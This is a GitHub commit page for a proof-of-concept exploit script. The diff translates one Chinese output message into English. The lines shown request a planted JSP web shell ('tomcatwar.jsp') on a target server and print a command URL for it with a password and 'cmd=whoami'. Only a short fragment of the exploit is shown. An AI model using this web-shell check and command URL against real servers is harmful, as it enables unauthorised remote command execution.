We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent efbf437 commit 07463b3Copy full SHA for 07463b3
poc.py
@@ -19,7 +19,7 @@ def Exploit(url):
19
shellurl = urljoin(url, 'tomcatwar.jsp')
20
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
21
if shellgo.status_code == 200:
22
- print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
+ print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
23
except Exception as e:
24
print(e)
25
pass
0 commit comments